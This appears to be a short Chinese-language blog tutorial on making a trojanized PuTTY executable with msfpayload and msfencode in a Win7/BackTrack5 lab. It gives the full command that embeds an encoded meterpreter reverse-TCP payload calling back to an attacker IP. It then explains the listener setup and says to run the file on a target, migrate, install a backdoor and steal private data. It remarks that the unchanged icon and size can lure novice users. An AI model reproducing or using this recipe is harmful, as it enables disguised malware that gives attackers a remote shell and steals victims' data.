实验环境:Win7SP1+Backtrack5.
使用工具有:msfpayload+msfencode.
0x01:使用msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.30.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/putty.exe -o /root/Desktop/putty_backdoor.exe
命令解释:
Msfpayload后面是一个具有回连功能攻击载荷.
LHOST设置为自己的IP,LPORT设置为自己的端口,用于回连.
R(Raw)是输出为二进制格式,|代表管道,将二进制数据通过管道给msfencode进行编码.
e选择编码的模块,c表示编码的次数,这里是5次.
t表示生成的格式,这里为exe.
x表示选择的源文件,o是输出加入PAYLOAD并进行过编码的木马文件.
0x02:生成的木马文件如图1-2.
0x03:进入MSF后,我们打开监听模块.
选择好PAYLOAD后设置目标回连的IP和端口即可.
0x04:把木马文件复制到目标机器上并执行.
0x05:查看监听状态,会发现有一个Meterpreter回连会话,这是你就可以使用migrate迁移进程,然后安装后门程序,再窃取隐私信息...
End:这次渗透测试还是很简单的,蛋疼的是看《Metasploit渗透测试魔鬼训练营》的木马程序制作时一直不成功,研究了几天后偶然在国外的技术文章中收获了点灵感————不使用-K参数,虽然生成的木马程序不能拥有源程序的完整功能,但图标和程序大小没有改变,足够诱惑小白用户了,虽然msfencode在2015年就宣布停止了,但我还是想把这块硬骨头啃烂,如果各位同道能找到解决方法,请联系我,谢谢!
报错问题.